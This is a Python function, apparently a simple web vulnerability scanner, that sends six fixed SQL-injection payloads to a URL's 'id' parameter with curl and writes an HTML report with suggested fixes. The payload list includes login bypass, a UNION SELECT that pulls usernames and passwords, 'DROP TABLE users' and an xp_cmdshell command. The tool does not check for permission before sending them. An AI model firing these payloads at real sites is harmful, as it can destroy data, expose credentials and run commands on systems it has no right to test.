import html
import os
import subprocess
import urllib.parse
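def run_sqlmap(url: str, *, timeout: float = 30.0):
    """
    Send a fixed list of SQL-injection probe strings to *url* and build a report.

    Each probe is URL-encoded, appended as the ``id`` query parameter and fetched
    with ``curl``. A probe is marked "✅" when curl exited 0 and the word "login"
    does not appear in the response body. That is only a rough signal: a normal
    page without the word "login" is not evidence of injection, and an error page
    may hide a real issue, so the report is a starting point for manual review
    rather than a verdict.

    Args:
        url (str): The URL to test. Surrounding whitespace is stripped; the value
            must start with ``http://``, ``https://`` or ``www.``.
        timeout (float): Seconds to wait for each curl call. A hung request is
            aborted and the whole run is reported as an error.

    Returns:
        tuple: ``(results, path)`` where *results* is the plain-text report and
        *path* is the HTML file it was written to. For an invalid URL the path
        is ``None``; for any other failure the path names a text file holding
        the error message instead.
    """
    try:
        url = url.strip()
        if not url.startswith(('http://', 'https://','www.')):
            return "Invalid URL: Must start with http:// or https:// or www.", None

        payloads = [
            ("' OR '1'='1 --", "Bypass login with always-true condition."),
            ("' UNION SELECT null, username, password FROM users --", "Extract user credentials via UNION SELECT."),
            ("'; DROP TABLE users; --", "Attempt to delete the users table."),
            ("' OR 'a'='a", "Bypass login with simple true condition."),
            ("'; EXEC xp_cmdshell('dir') --", "Execute system command on the server."),
            ("' AND 1=0 UNION ALL SELECT NULL, version(), current_user --", "Retrieve DB version and current user."),
        ]

        results = ""
        for payload, purpose in payloads:
            encoded_payload = urllib.parse.quote(payload)
            # The probe is appended verbatim; a URL that already carries a query
            # string is not merged with it.
            full_url = f"{url}?id={encoded_payload}"
            command = ['curl', '-X', 'GET', full_url]
            # timeout= stops one unresponsive host from hanging the whole run;
            # TimeoutExpired is handled by the except block below.
            result = subprocess.run(command, capture_output=True, text=True, timeout=timeout)

            # Heuristic only: exit status 0 plus no "login" text in the body.
            success = "✅" if result.returncode == 0 and "login" not in result.stdout.lower() else "❌"
            results += f"{success} Payload: {payload}\n"
            results += f"Purpose: {purpose}\n"
            if success == "✅":
                results += "Result: Potential vulnerability detected!\n"
            else:
                results += "Result: No vulnerability detected for this payload.\n"
            results += "\nResponse Preview:\n" + result.stdout[:200] + "...\n\n"

            # Explain the issue and potential fixes
            if success == "✅":
                results += "Explanation: The server responded positively to the payload, suggesting a possible vulnerability.\n"
                if "1'='1" in payload:
                    results += "Issue: SQL injection allows login bypass.\n"
                    results += "Fix: Use prepared statements or ORM libraries to prevent SQL injection. Validate and sanitize user inputs.\n"
                elif "DROP TABLE" in payload:
                    results += "Issue: SQL injection can delete critical tables.\n"
                    results += "Fix: Apply strict database permissions and input filtering.\n"
                elif "xp_cmdshell" in payload:
                    results += "Issue: Remote code execution.\n"
                    results += "Fix: Disable dangerous SQL functions and limit server privileges.\n"
                else:
                    results += "Issue: Data leakage or server exploitation.\n"
                    results += "Fix: Use Web Application Firewalls (WAFs) and keep software up to date.\n"
            results += "\n"

        # Save results to a file. The report embeds raw server output, so it is
        # escaped before being placed inside the page: a response containing
        # markup or script would otherwise execute for whoever opens the file.
        # encoding="utf-8" is explicit because the "✅"/"❌" markers are not
        # representable in some platform default encodings.
        output_file = "./sql_injection_result.html"
        with open(output_file, "w", encoding="utf-8") as file:
            file.write(f"<html><body><pre>{html.escape(results)}</pre></body></html>")

        return results, output_file

    except Exception as e:
        # Top-level boundary: report the failure instead of raising, matching
        # the (message, path) shape of the success path.
        error_message = f"Error running SQL Injection test: {str(e)}"
        error_file = "./sql_injection_error.txt"
        with open(error_file, "w", encoding="utf-8") as file:
            file.write(error_message)
        return error_message, error_file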